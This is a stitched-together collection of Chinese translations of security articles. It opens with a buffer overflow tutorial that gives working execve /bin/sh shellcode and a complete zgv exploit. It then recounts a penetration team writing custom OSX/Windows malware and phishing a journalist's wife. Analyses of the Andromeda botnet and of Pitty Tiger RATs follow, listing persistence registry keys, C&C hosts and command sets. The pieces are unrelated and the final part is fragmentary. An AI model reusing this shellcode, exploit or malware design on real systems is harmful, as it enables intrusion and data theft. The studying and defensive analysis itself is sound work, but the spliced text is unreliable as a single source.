为了简单，Shellcode使用简单的汇编指令，我们写在栈上，然后更改返回地址，使它返回到栈内。使用这个方法，我们可以我们可以把代码插入到一个脆弱的进程中，然后在栈中正确的执行它。所以，让我们通过插入的汇编代码来运行一个Shell。一个常见的调用命令是execve()，它加载和运行任意的二进制代码，终止执行当前的进程。联机界面给我的应用：

int  execve  (const  char  *filename, char *const argv [], char *const envp[]);

Lets get the details of the system call from glibc2:

# gdb /lib/libc.so.6

(gdb) disas execve

Dump of assembler code for function execve:

0x5da00 :       pushl  %ebx

/* this is the actual syscall. before a program would call execve, it would

  push the arguments in reverse order on the stack: **envp, **argv, *filename */

/* put address of **envp into edx register */

0x5da01 :     movl   0x10(%esp,1),%edx

/* put address of **argv into ecx register */

0x5da05 :     movl   0xc(%esp,1),%ecx

/* put address of *filename into ebx register */

0x5da09 :     movl   0x8(%esp,1),%ebx

/* put 0xb in eax register; 0xb == execve in the internal system call table */

0x5da0d :    movl   $0xb,%eax

/* give control to kernel, to execute execve instruction */

0x5da12 :    int    $0x80

0x5da14 :    popl   %ebx

0x5da15 :    cmpl   $0xfffff001,%eax

0x5da1a :    jae    0x5da1d <__syscall_error>

0x5da1c :    ret

结束汇编转存。

4.1 使代码可移植

我们必须应用一个策略使没有参数的Shellcode在内存中的传统方式，通过在它们的页存储上的精确位置，在编译中完成。

一旦我们估计shellcode的大小，我们能够使用指令jmp和call来得到指定的字节在执行线程向前或是向后。为什么使用call？我们有机会使用CALL来自动的在栈内存储返回地址，这个返回地址是在下一个CALL指令后的4个字节。通过放置一个正确的变量通过使用call，我们间接的把地址压进了栈中，没有必要了解它。

0   jmp      (skip Z bytes forward)

2   popl %esi

... put function(s) here ...

Z   call <-Z+2> (skip 2 less than Z bytes backward, to POPL)

Z+5 .string     (first variable)

（注：如果你要写的代码比一个简单的shell还要复杂，可以多次使用上面的代码。字符串放在代码的后面。你知道这些字符串的大小，因此可以计算他们的相对位置，一旦你知道第一个字符串的位置。）

4.2 Shellcode

global code_start           /* we'll need this later, dont mind it */

global code_end

       .data

code_start:

       jmp  0x17

       popl %esi

       movl %esi,0x8(%esi)     /* put address of **argv behind shellcode,

                               0x8 bytes behind it so a /bin/sh has place */

       xorl %eax,%eax            /* put 0 in %eax */

       movb %eax,0x7(%esi)   /* put terminating 0 after /bin/sh string */

       movl %eax,0xc(%esi)    /* another 0 to get the size of a long word */

my_execve:

       movb $0xb,%al             /* execve(         */

       movl %esi,%ebx           /* "/bin/sh",      */

       leal 0x8(%esi),%ecx      /* & of "/bin/sh", */

       xorl %edx,%edx           /* NULL           */

       int $0x80        /* );           */

       call -0x1c

       .string "/bin/shX"   /* X is overwritten by movb %eax,0x7(%esi) */

code_end:

（相对偏移了0x17和-0x1c通过放在0x0，编译，反汇编和看看shell代码的大小。）

这是一个正在工作着的shellcode，虽然很小。你至少使用exit()来调用和依附它（在调用之前）。Shellcode的正真的艺术还包括避免任何二进制0代码和修改它为例，二进制代码不包含控制和小写字符，这将会过滤掉一些问题程序。大多数的东西是通过自己修改代码来完成的，就是我们想的使用mov %eax,0x7(%esi)指令。我们用\0来取代X，但是在shellcode初始化中没有\0。

让我们测试下这些代码，保存上面的代码为code.S和下面的文件为code.c：

extern void code_start();

extern void code_end();

#include <stdio.h>

main() { ((void (*)(void)) code_start)(); }

# cc -o code code.S code.c

# ./code

bash#

现在你可以把shellcode转变成16进制字符缓冲区。要做到这的最好的方法就是打印：

#include <stdio.h>

extern void code_start(); extern void code_end();

main() { fprintf(stderr,"%s",code_start);

通过使用aconv –h或bin2c.pl来解析它，可以在http://www.dec.net/~dhg或是http://members.tripod.com/mixtersecurity上找到工具。

五 写一个利用

让我们看看如何改变返回地址指向的shellcode进行压栈，写一个攻击的例子。我们将要采用zgv，因为这是可以利用的一个最简单的事情。

# export HOME=`perl -e 'printf "a" x 2000'`

# zgv

Segmentation fault (core dumped)

# gdb /usr/bin/zgv core

#0  0x61616161 in ?? ()

(gdb) info register esp

     esp: 0xbffff574 -1073744524

那么，这是在栈顶的故障时间，安全的假设是我们能够使用这作为我们shellcode的返回地址。

现在我们要在我们的缓冲区前增加一些NOP指令，所以我们没有必要对于我们内存中的shellcode的精确开始的预测100%的正确。这个函数将会返回到栈在我们的shellcode之前，通过这个方式使用NOPs的头文字JMP命令，跳转到CALL，在转回popl，在栈中运行我们的代码。

记住，栈是这样的。在最低级的内存地址，ESP指向栈的顶部，初始变量被储存，即时缓冲器中的zgv储存了HOME环境变量。在那之后，我们保存了EBP和前一个函数的返回地址。我们必须要写8个字节或是更多在缓冲区后面，用栈中的新的地址来覆盖返回地址。

Zgv缓冲器有1024个字节。你可以通过扫视代码来发现，或是通过在脆弱的函数中搜索初始化的subl $0x400,%esp (=1024)。我们可以把这些放在一起来利用。

5.1 zgv攻击实例

/*                   zgv v3.0 exploit by Mixter

          buffer overflow tutorial - http://1337.tsx.org

        sample exploit, works for example with precompiled

    redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

/* This is the minimal shellcode from the tutorial */

static char shellcode[]=

"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"

"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP     0x90

#define LEN     1032

#define RET     0xbffff574

int main()

{

char buffer[LEN];

long retaddr = RET;

int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* this fills the whole buffer with the return address, see 3b) */

for (i=0;i<LEN;i+=4)

   *(long *)&buffer[i] = retaddr;

/* this fills the initial buffer with NOP's, 100 chars less than the

   buffer size, so the shellcode and return address fits in comfortably */

for (i=0;i<LEN-strlen(shellcode)-100);i++)

   *(buffer+i) = NOP;

/* after the end of the NOPs, we copy in the execve() shellcode */

memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run zgv */

setenv("HOME", buffer, 1);

execlp("zgv","zgv",NULL);

return 0;

}

/* EOF */

We now have a string looking like this:

[ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]

While zgv's stack looks like this:

v-- 0xbffff574 is here

[     S   M   A   L   L   B   U   F   F   E   R   ] [SAVED EBP] [ORIGINAL RET]

The execution thread of zgv is now as follows:

main ... -> function() -> strcpy(smallbuffer,getenv("HOME"));

此时，zgv做不到边界检查，写入超出了smallbuffer，返回到main的地址被栈中的返回地址覆盖。function()离不开/ ret和栈中EIP的指向。

0xbffff574 nop

0xbffff575 nop

0xbffff576 nop

0xbffff577 jmp $0x24                    1

0xbffff579 popl %esi          3 <--\    |

[... shellcode starts here ...]    |    |

0xbffff59b call -$0x1c             2 <--/

0xbffff59e .string "/bin/shX"

Lets test the exploit...

# cc -o zgx zgx.c

# ./zgx

using address 0xbffff574

bash#

5.2 编写攻击的进一步提示

有很都可以被利用的程序，但还是很脆弱。但是这有很多的技巧，你可以通过过滤等方式得到。还有其他的溢出技术，这并不一定要包括改变返回地址或是只是放回地址。有指针溢出，函数分配的指针能够被覆盖通过一个数据流，改变程序执行的流程。攻击的返回地址指向shell环境指针，shellcode为与那里，而不是在栈上。

对于一个熟练掌握shellcode的人是在根本上的自己修改代码，最初包含可以打印的，非白色的大写字母，然后修改自己它，把shellcode函数放在要执行的栈上。

你应该永远不会有任何二进制0在你的shell代码里，因为如果它包含任何都可能无法正常的工作。但是本文讨论了怎么升华某种汇编指令与其他的命令超出了范围。我也建议读其他大的数据流怎么超出的，通过aleph1，Taeoh Oh和mudge来写的。

5.3 重要注意事项

你将不能在Windows 或是 Macintosh上使用这个教程，不要和我要cc.exe和gdb.exe。

六 结论

我们已经知道，一旦用户依赖存在的的溢出，在90%的时间了是可以利用的，即使利用起来和困难，同时要一些技能。为什么写这个攻击很重要呢？因为软件企业是无知的。在软件缓冲区溢出方面的漏洞的报告已经有了，虽然这些软件没有更新，或是大多数用户没有更新，因为这个漏洞很难被利用，没有人认为这会成为一个安全隐患。然后，漏洞出现了，证明和实践是程序能够利用，而且这就要急于更新了。

作为程序员，写一个安全的程序是一个艰巨的任务，但是要认真的对待。在写入服务器时就变的更加值得关注，任何类型的安全程序，或是suid root的程序，或是设计使用root来运行，如特别的账户或是系统本身。使用范围检查，更喜欢分配动态缓冲器，输入的依赖性，大小，小心/while/etc。收集数据和填充缓冲区，以及一般处理用户很关心的输入的循环是我建议的主要原则。

目前在安全行业取得了显著的成绩，使用非可执行的栈，suid包，防卫程序来核对返回值，边界核查编辑器等技术来阻止溢出问题。你应该在可以使用的情况下使用这些技术，但是不要完全依赖他们。如果你运行vanilla的UNIX的发行版时，不要假设安全，但是有溢出保护或是防火墙/IDS。它不能保证安全，如果你继续使用不安全的程序，因为_all_安全程序是_software_和包含自身漏洞的，至少他们不是完美的。如果你频繁的使用updates _和_ security measures，你仍然不能渴望安全，_but_你可以希望。

（全文完）

原文：http://blog.spiderlabs.com/2013/10/hacking-a-reporter-writing-malware-for-fun-and-profit-part-1-of-3.html

翻译：徐文博

Mattew Jakubowski(@jaku) 对此文的编写做出了贡献。

潘多省日报（Pando Daily）的编辑Adam Penenberg最近发表了一篇文章“我让黑客来调查我，他们的发现让我不寒而栗”，讲述了我和我的小伙伴“骚扰”他生活的事情。 如果你还没读过， 那我强烈建议你去瞅瞅。

本周该日报上又发布了一篇后续文章，“一个记者让我们黑他，我们是怎么做到的呢”，从我们的角度进行了阐述。

我想有些读者朋友可能比较好奇更详细的渗透技术细节。所以我们决定对此发表3篇的系列文章以示阐述。

第一部分和第二部分将详细介绍我们自身团队（ Matt Jakubowski, Daniel Chechik,和我)所做的用于本次渗透的恶意软件和钓鱼邮件。下周，我们的同事Garret Picchioni将会展示更多的关于现场和无线入侵的技术细节。

我在蜘蛛实验室（SpiderLabs）的恶意软件分析小组（Malware Analysis Team)作为一名安全研究员的日常工作主要包括逆向恶意软件（通常是取证分析期间遇到的一些东西）。 当被要求加入这次行动时，很自然的我会帮着写些定制的恶意软件以获取Adam电脑的权限。 通过编写一个恶意文件就能证明我的“黑帽”身份，这样的机会真的很难得哦。这让我可以站在双方的角度去看待问题，也转而有助于我的日常逆向工作。总之，我对此很兴奋。

我们要去黑个记者， 写些定制的恶意软件，来玩玩吧。

第1步：侦查/准备工作

在对Adam进行攻击之前，我们尽量收集了很多信息。 也找到了很多——公寓的照片， 信用记录报告，姓名，生日，电子邮件，电话号码等等。还有很多没有列举，但仍然有个问题。 即使有了这些，我们也没能知道他和妻子所用的操作系统（Windows, OSX, Linux等等）。 在针对特定的目标设计恶意软件时，所用的负载是平台相关的。为此，我们需要一个与平台无关的攻击包，能够识别出操作系统，并能根据操作系统下载执行相应的恶意软件。在这一步，我求助了我的同事Daniel Chechik(@danielchechik)。Daniel专攻web的攻击利用，能用他的专业知识给予团队帮助。 我向他描述了需求，以及所面临的困境。 几天之后， 他给我带来了很棒的解决方案。

Daniel 创建了一个恶意的Java小程序来检测运行在目标主机上运行的Java版本，以及主机的操作系统。有了这些信息，该程序将利用已知的Java漏洞(CVE-2013-2423或者CVE-2012-0503)，根据操作系统下载一个特定的负载，并予以执行。我对该小程序进行了稍微的修改，保证即使漏洞利用失败的情况下也能够下载、执行特定的负载， 以防用户更新了Java版本。最后看起来是这样的：

图1：Java恶意软件执行流图

不管Adam或者其妻子的电脑上运行的是Mac还windows操作系统，我们的方案都能将其感染，同时也提供了多个攻击包，根据所实际所安装的Java版本进行利用。

现在你可能会问，“等等，如果没有安装Java呢？”， “如果他们是在智能手机上打开文件呢？”。 “如果安装了杀毒软件怎么办？”。 这些都是可能的问题。 杀软对Daniel所创建的文件，以及我所编写的OSX/Windows上的恶意软件， 有很低的检测率。 即使Adam的电脑上运行了杀软， 它们也很难拦截到这些文件。 至于受害者电脑的Java版本， 以及可能通过移动设备访问文件这些问题，要记住，这只是我们众多计划方案中的很小一部分。我们没有期望这是一个完美的方案。 我们把鸡蛋放到了不同的篮子里，总希望有一个能成功。 这就是作为攻击者的优势所在。我们无需每一个计划都成功——只要有一个能搞定就行了。攻击的目标却需要应对我们的每一次尝试。

有了这个可以攻击多个平台的恶意文件，轮到我着手编写运行在Windows和OSX上的恶意软件了。这是我第一次写OSX上的恶意软件，是个非常有趣的学习经历。我的计划很简单——如果恶意软件加载到Adam的电脑上，要完成下面两件事：

1. 确保恶意软件能持久地存在，除非我手动的将其卸载。

2. 下载执行其他的恶意软件或者命令， 赋予我们对电脑的完全控制权。

    图2：OSX上恶意软件的代码片段

这就是我所做的。编写Windows上的恶意软件非常简单了，因为之前已为其他事件写过类似的程序。 实际上，编写OSX的恶意软件同样也很简单。 比我原来所想的要简单的多，大概花费了一到两天的时间来完成（主要因为所做的测试，确保其正常运行）。 虽然不同平台下的二进制文件不同，但它们所执行的逻辑是相同的， 如下所示：

1. 将自身拷贝到文件系统的一个隐藏目录

2. 通过一些常用的手段来确保持久存在

3. 每10分钟向远程服务器请求一次，查看是否有要执行的指令。如果有，就执行指令。

准备好了恶意软件，是时候“攻击”Adam和他的妻子了。

第2步：攻击

Adam已经在文章里提到了很多的细节， 所以我会尽量不重复那么多。我们决定对Adam和妻子进行钓鱼邮件攻击。我们知道Adam的妻子有个普拉提（Pilates)工作室，我们可以扮成找工作的。我写了一封看上去很正常的寻找普拉提教练的邮件，附加上Daniel的恶意Java小程序发了出去。

几天后，我们命中了。我们紧紧抓住机会，十分钟之内就获得了对Adam妻子电脑的完全控制权。似乎是她打开了Java文件导致OSX恶意软件安装到了她的电脑上。在这十到十五分钟里，我们沉浸在获得权限的喜悦之中，无比幸福。

然后呢？然后，突然就沉默了。

我们失去了连接，再也没有重新获取到。我们静静的坐着，想象着可能发生的情况。或许她只是完成了今天的工作，然后关上了电脑。 我们再等了36个小时，希望再次获取连接。在此期间， Jaku和Garret （在纽约现场）通过其他的手段进行着攻击。

此时，我开始怀疑我的恶意软件。 我担心因为我的一个愚蠢的错误使得我们丧失了唯一的机会。对代码审查之后，很确定，是我犯了错。没有做太多的技术处理，我逻辑处理中的一个错误导致恶意软件在Adam妻子关上电脑（将其休眠而不是重启）之后无法运行。 意识到这一点，25分钟之后，我搞好了OSX恶意软件的2.0版本。 可问题是，我需要让她再次打开该文件。

第2.5步：再次攻击

即便我准备好了新版本的OSX恶意软件，我们也很难消除Adam妻子的疑虑，让其再打开一个Java文件。 因为我们没跟Adam有任何联系，也不确定她妻子是否怀疑了。我们猜测可能他妻子已经告诉他所收到的怪异邮件，以及附件如何打不开。Adam可能已经让她恢复了电脑备份，不要再打开类似文件。总之，我们想再次获取权限的希望渺茫。

我们决定用不同的发送机制来推进。这次，Jaku给我提供了帮助。我们将恶意的OSX程序打包进一个ZIP文件。当文件打开时， 程序不仅会执行我改进后的恶意软件，同时还会打开一个合法的视频文件。这是符合我们上次的处理场景的。也更改了默认的图标，让其看起来是个正常的视频文件。 我们猜测如果Adam妻子这次再打开文件，看到一个视频文件打开，会认为文件是正常的。

图4.钓鱼邮件（取自潘多省日报的原文章）

第二天，焦灼的等待中，终于有了新的连接。Adam的妻子打开了第二封邮件。我们再次获得了20分钟的权限。

然后，突然又再次失去了连接。

我们屏住呼吸，希望她只是简单的再次关上了电脑。 我们的新版恶意软件会在其再次打开电脑时恢复操作。我们一直等待着，吃完了晚饭，继续等待着。

敬请期待该系列的下篇文章，我们将会介绍恶意软件攻击的第3步，以及我们如何获取到财务记录，W-2信息，以及更多的来自Adam妻子受感染电脑的信息。

（未完待续）

原文：http://blog.fortinet.com/post/A-Good-Look-at-the-Andromeda-Botnet

翻译：徐文博

Andromeda是一个模块化的bot。最原始的bot仅包含一个加载器，在其运行期间会从C&C服务器上下载相关模块和更新，它同时也拥有反虚拟机和反调试的功能。它会注入到可信进程中来隐藏自己，然后删除原始的bots。该bot会潜伏很长时间（从几天到几个月不等）才与C&C服务器进行通信。所以，很难获取到感染主机和C&C服务器间的网络流量信息。

最新的官方编译版本是2.06，该版本的bot所发的包中有新增的内容。此外，它也能够分发其他多样的僵尸变种，下载相关模块和更新。

图1：GeoIP地图显示的Andromeda的分布

一、打包器

打包器中有大量的冗余代码，所以可以很好的隐藏真实代码。它会调用GetModuleHandlerA API去获取bot的基址，检查MZ标记和PE特征码，然后确认是否有6个段。如果是，则会从第4个段中加载数据，进行解密，然后会校验解密的MZ标记、PE特征码，调用CreateProcessW API来重新加载执行原始的bot，但会把dwCreationFlags值设为CREATE_SUSPENDED。打包器会用解密的第4个段中的代码，来注入到这第二个进程中。稍后，打包器会采用同样的方法，从第5个段中加载另一个PE。

这个强大的打包器能够同时嵌入、执行两个不同的恶意代码。然而，第4个段中的数据解密后并不是PE格式，所以，该打包器仅能携带而不能执行Andromeda bot。

二、加载器

该加载器首先从TEB结构中获取到ntdll.dll的基址，将其作为参数，来获取ntdll导出的API，提升了分析的复杂度。对API的处理不是通过函数名称，而是使用校验和。下面是一些API的校验和以及它们对应的名称：

5584B067h OpenMutexA

5F467D75h SetErrorMode

5E639D43h VirtualFree

0AAEB7C1Eh VirtualAlloc

9ED23A16h LoadLibraryA

94D07C92h CloseHandle

8C552DB6h Process32Next

0B4D1BAFAh Process32First

99D6DD7Ah CreateToolhelp32Snapshot

41D27AF6h GetModuleHandleA

接着，加载器会调用OpenMutexA API来检查“lol”互斥量，以决定是否需要跳过反虚拟机和反调试的相关处理。

如果没找到这个互斥量，bot就会确认是否在虚拟机或者调试环境下执行：

1） 遍历当前进程列表，将每个进程名称转换为小写，然后计算其校验和，与嵌入的校验和做比较，它代表着虚拟机环境。（如图2）

图2：反虚拟机

2） 然后试着调用GetModuleHandleA API加载sbiedll.dll来检查是否为Sandboxie虚拟机。

3） 查询下面的注册表项，获取磁盘名称（见图3）：

key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum

跳过最开始的8个字节，然后检查接下来的4个字节（图4）

目前，加载器检测3款虚拟机，如图4所示。

图3：查询注册表，获取磁盘名称

图4：跳过8字节，然后检查接下来的4个字节

4）两次调用rdtsc指令，来计算返回值的不同。大于200h的返回值表示在调试环境中。

如果bot加载器检测到任何的异常情况，它不会像其他僵尸那样直接退出，而是继续运行一小段我称之为“passive code”(被动模式代码）的代码。

被动模式的代码

这一小段代码将其自身拷贝到%ALLUSERSPROFILE%文件夹中，变成svchost.exe，然后在如下的注册表项中添加自身：

Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

ValueName:SunJavaUpdateSched

Data:%ALLUSERSPROFILE%\\svchost.exe

这段代码会打开本地的8000端口进行监听。一旦接收到远程命令，就会执行cmd.exe进行接收、执行。

三、主要代码的注入

调用SetEnvironmentVariableW API将最初bot的全路径保存到环境变量src中，然后调用ZwQueryInformationProcess API来检查系统版本是32位的还是64位的。如果是运行在32位系统上，bot就会注入wuauclt.exe，否则，会注入svchost.exe。（我们的示例是运行在32位系统下。）

Bot会创建一个新的进程wuauclt.exe，其dwCreationFlags被设置为CREATE_SUSPENDED。然后调用多个MAP API注入wuauclt.exe。将wuauclt.exe的入口点代码改成如下的代码：

push <address of injected code>

retn

最后，bot会调用ZwResumeThread API来激活注入的进程wuauclt.exe, 然后直接退出。

四、主要代码的本地环境初始化

所注入的代码，所有的信息都是显而易见的。没有什么加密的字符串、代码段等。Bot调用SetErrorMode API来禁用大多数的错误告警窗口。其参数是0x8007, 代表如下的含义：

• SEM_FAILCRITICALERRORS

• SEM_NOALIGNMENTFAULTEXCEPT

• SEM_NOGPFAULTERRORBOX

• SEM_NOOPENFILEERRORBOX

Bot调用GetEnvironmentVariableW API，结合环境变量src来获得最初bot的全路径，然后调用SetEnvironmentVariableW API将这个变量设为空串。它会检查当前进程（wuauclt.exe)的安全标识，看它是否属于管理员，然后设置复制的目的地和注册表键值。之后，使用当前的时钟滴答值来确定文件名的后缀。

Bot可能将其自身拷贝到两个目的地其中的一个：

如果当前用户是管理员，“ar”标志被设为1。Bot会设置如下的注册表：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

<%lu>

%allusersprofile%\Local Settings\Temp\ms<%s>.<%s>

否则，“ar”标志会被设为0，如下设置注册表：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Load

%allusersprofile%\Local Settings\Temp\ms<%s>.<%s>

根据当前时钟滴答值，文件名的后缀可能是它们中的一个：exe、com、scr、pif、cmd或者bat。

Bot会利用系统卷信息产生的字符串再新建一个互斥量。如果该互斥量已经存在，就会删除原来的bot样本，然后直接退出。否则，bot将其自身拷贝到目的地，再添加到注册表中，以便下次系统启动时，会自动的运行。

最终，bot会创建两个新线程来，结合注册表来执行之前保存的模块和注册表中的DLL（图6）。当然了，它们使用了RC4加密算法，有一个假的ZIP头部（图7）。

图6：新建两个线程来执行之前保存的模块

图7：这些线程使用了RC4加密，有个假的ZIP头部

至此，完成了本地的初始化操作，接下来将会准备与C&C服务器的网络操作。

五、网络操作的初始化

Bot 会循环地每隔23C34600h毫秒新建一个线程，也就是6天一次。因此，对网络流量的短期监控并不足以检测到Andromeda的存在。

第一次发送的包的格式如下：

id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu

• id 值根据本地系统卷信息产生

• bid 值是硬编码的，可能指编译id.

• bv值也是硬编码的，可能指编译版本（目前是206h(518))

• sv值代表受害机器的系统版本

• pa值是调用ZwQueryInformationProcess API的返回值，用以确定OS是32位还是64位。

• la值是根据www.update.microsoft.com的IP地址而生成的

• ar值是调用CheckTokenMembership API的返回值，确认bot是否运行在管理员权限下。

其中，pa和ar值是该版本的Andromeda新增的数据。

示例如图8所示。 图9展示了同样的内容进行RC4加密后的情况，图10展示了进行base64编码后的数据。最后，图11展示了真实的网络流量，图12展示了接收的数据包的二进制表示。

图8：网络包举例

图9：RC4加密后

图10：base64编码后的字符串

图11：真实的网络流量

图12：接收到的数据包的二进制视图

对内容的简单结构化表示如下：

Struct RecvPack
{
    INT CRC32;
    Char(*) Body;
}*RecvPack;

C&C服务器没有采用同一个RC4 key来加密应答包，而是使用了id值，其长度只有4字节。所以，不发送数据包，我们是没办法对应答数据包进行解密的。

接收到的数据包，解密后如图13所示

图13：接收到的数据包解密后的情况

其结构如下：

首先来根据Andromeda C&C服务器的网页控制面板的快照看看命令类型（“Task type”)的含义（图14）。

图14：Andromeda C&C服务器的网页控制面板快照，显示了多样的命令类型（“Task type”)

所接收到的数据包中有多块内容（在图13中有两块）。图13中，第一块的Cmd type是2，表示“安装插件”。Bot会试图下载相关模块，如图15所示。

图15：Bot试图下载模块

该模块有大小为0x10的假Zip头部。前面我们已经看到过这样的例子，只不过是保存在注册表中（图7），它们是一样的。

Bot在模块执行后，会将其保存到注册表中。然后Bot会反馈如下格式的信息给C&C服务器：

id:%lu|tid:%lu|result:%lu

一个真实的例子如下所示：

id:150233784|tid:106|result:1 

这里的id和所发送的数据包中的是一样的。Tid在块的04偏移处，106就是16进制的6A。如果模块执行成功，result值就是1，否则为0。图16展示了网络流量。

图16：网络流量

其他块的Cmd type是1，表示“下载exe”, 传播其他的恶意软件。Bot会试图下载exe，将其作为临时文件来运行。Exe文件并没有像模块那样进行了加密（图17）：

图17：exe没有加密

执行之后，Bot会与C&C服务器进行通信。

图18：Bot与C&C服务器的通信

我们见过一个名为“r.pack”的模块。它在执行期间做了啥？是否还安装了其他类型的模块呢？

六、模块

在另外一个变种的网络流量中，至少见过另外两个模块（图19）。共有3个模块，如下：

图19:观察到两个模块

1、r.pack

这个r.pack是ring3级rootkit，它会注入所有运行中的进程，然后hook住如下的API来隐藏自身：

• ZwResumeThread

• ZwQueryDirectoryFile

• ZwEnumerateValueKey

2、f.pack

该模块用于信息收集。它会新建一个线程，初始化、监控一个命名的管道。一旦有数据进入该管道，线程就会对其进行解析，通过一个不同的URL链接与C&C服务器通信。（图20）

图20

线程会将默认的C&C服务器的入口image.php替换为fg.php，然后添加一个参数id,与第一次发包的id一样。

所发包的内容是base64加密的（与前面发包的一样）。解密后，数据如下：-config C&C服务器会用格式化的数据进行应答，算法与之前的应答数据包相同，只是这里的RC4 key不是取自id, 而是发包用的的RC4 key.

解密后的格式如下：

• facebook.com.+pass=

接下来，和r.pack一样，它会注入所有运行的进程，hook住ZwResumeThread API。然后检查进程名称。一旦找到如下的4种网页浏览器，就会hook住相应的API来收取信息：

POST字段后的所有数据都会被检查，如果符合所有的条件，则会被发送到命名管道中。之前提到对该命名管道进行监控的线程会继续根据相关格式验证所抓取到的数据，然后发送到C&C服务器上。

3、S.pack

该模块充当一个本地代理，有个导出函数Report，用于显示自己的信息（图21）

图21

该模块会打开本地的0438h(1080）端口，等待远程连接。如果受害机器是在防火墙后面，这就不起作用了。目的IP和端口在应答包中。

七、另外一个特殊的变种

Andromeda的另外一个变种的应答包如图22所示。

图22

我们可以看到，它没有Cmd type 2, 只有“安装exe”的Cmd type 1和“更新bot”的Cmd 3，此时，该bot只是用于分发其他的恶意软件（如,ZeroAccess, Kelihos, FakeAV,等）

八、结论

我们已经目睹了Andromeda bot所做的变化。它非常的灵活，极具动态性。通过安装不同的模块，可以增强其自身在不同领域的功能。也可以很高效的分发其他恶意软件。它使用多个RC4 key用于加密同C&C服务器间的通信，这使得很难对其跟踪。

此外，不同的僵尸网络联合起来进行传播，所以受感染的机器暴露于更大的风险之下。这给有效的检测、清除感染机器带来了严重的问题。

猫和老鼠的故事还是继续着。老鼠变得越来越聪明，灵活多变，那么猫呢？

（全文完）

From: XXXXXXX To: XXXXXXX File: 1 Attachment: Bird’s Eye Point of View.doc While the holiday season means clustering clustering ‘time for a vacation’ for many, there are Those That Will Be of us staying home this year. That’s why we’ve Decided to take you on a trip around the world from a bird’s eye view of the item! It’s safe to say That MOST of the lucky people on vacation Will not see breathtaking sights like these. Remember to look down! XXXXXX

利用Troj/ReRol.A感染计算机的word文档

Pitty Tiger通过HeartBleed漏洞窃取到的内存数据

你好！

Pitty Tiger的诱饵测试文档

C:\DOCUME~1\USER\LOCALS~1\Temp\svohost.exe

Troj/ReRol.A触发的sandbox警报

在sandbox用户文件夹中创建的Pitty Tiger恶意软件副本

Troj/ReRol.A与C&C服务器之间的加密通讯

Mozilla/4.0 (compatible;)

Key Path: \REGISTRY\USER\<SID>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Value Name: Shell Value: explorer.exe,C:\DOCUME~1\XXXXXX\APPLIC~1\svohost.exe,

HostName :xxx UserName :xxx SysType  :32bit Windows 7 Enterprise Service Pack 1 6.1 7601 Organization: Owner:xxx   --------------Server Info-------------------  - AdobeARMservice - Adobe Acrobat Update Service - AeLookupSvc - Application Experience - AudioEndpointBuilder - ... (list goes on)   --------------Soft Info-------------------        1    Adobe AIR 4.0.0.1390        2    Adobe Shockwave Player 12.0 12.0.9.149        3    FileZilla Client 3.7.4.1 3.7.4.1        4    Mozilla Thunderbird 24.3.0 (x86 en-US) 24.3.0        5    ... (list goes on)   --------------IP Config------------------- Adapt Type: Ethernet NetCardNum:        11 NetCard Name:    {XXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX} Description :          Realtek RTL8139C+ Fast Ethernet NIC MAC-ADDR:           XX-XX-XX-XX-XX-XXX IP-Addr:                   10.xxx.xxx.xxx IP-Mask:                  255.255.255.0 GateWay:               10.xxx.xxx.xxx DHCP Serv:           1 DHCP Host:           10.xxx.xxx.xxx WINS Serv:           0 WINS PriHost:        WINS SecHost:

Troj/ReRol.A收集的样例信息

1. dr.asp：实现控制的ASP前端，它能够设置变量、发送payload。
2. JHttpSrv.DLL：通过”regsvr32”实现的控制程序。ASP前端以4种方式调用这个程序：

• SETIP：设置bot的IP地址；
• AddKeyword(strKeyword, strFilePath): 在服务器上绑定关键字；
• Work(lpByteArray, nDataLength): 解密playload，搜索注册的关键词、生成相关log；
• ResponseBinary(): 回传符合特定关键字的可执行程序。

• “SysType :32bit” 设置程序为 “32.exe”
• “SysType :64bit” 设置程序为“64.exe”

• 3200.exe
• 322.exe
• 32m.exe
• 32mm.exe

Pitty Tiger RAT触发的sandbox警报

Sandbox中Pitty Tiger释放的文件

Key Path: \REGISTRY\USER\<SID>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Value Name: UserInit Value: C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\qmgrxp.exe,

“packet64.dll”是RAT的主要payload。在注入进程之后，便开始发送Hello数据包到C&C服务器：

PittyTiger RAT的样例通讯

--------------------------PittyTigerV1.0  ---------------------

--------------            ^ ^   ----------------------------

--------------             ^    ----------------------------

Version:NULL

我们的样本有三个C&C服务器配置：

• jackyandy.avstore.com.tw:80
• chanxe.avstore.com.tw:443
• newb02.skypetm.com.tw:80

接下来被执行的有以下命令：

• 文件下载（get）和上传（put）
• 8bit（prtsc）和16bit（prtsc2）屏幕截取
• 远程shell（ocmd/ccmd）
• 配置上传（setserv/freshserv）
• 直接命令执行

至于控制端部分，我们发现有两个不同的版本：

• 仅处理PittyTiger连接的Delphi程序
• 处理PittyTiger和CT连接的.NET程序

其中处理PittyTiger和CT连接的程序界面很有意思。我们已经能够确认有两个不同家族的恶意软件出自同一个作者之手，另一个恶意软件是后面我们将看到的“CT RAT”。

Pitty Tiger RAT控制端部分

CT RAT触发的sandbox警报

Sandbox中由CT RAT释放的文件

Key Path: \REGISTRY\USER\<SID>\Software\Microsoft\Windows NT\CurrentVersion\Windows

Value Name: load

Value: c:\PROGRA~1\INTERN~1\ieupdate.exe

在注入之后，RAT会发送一个初始登陆数据包至C&C服务器：

被CT RAT感染的计算机发出的加密通讯

Login

->C:PC-XXX

->U:User-XXX

->L:10.10.10.1

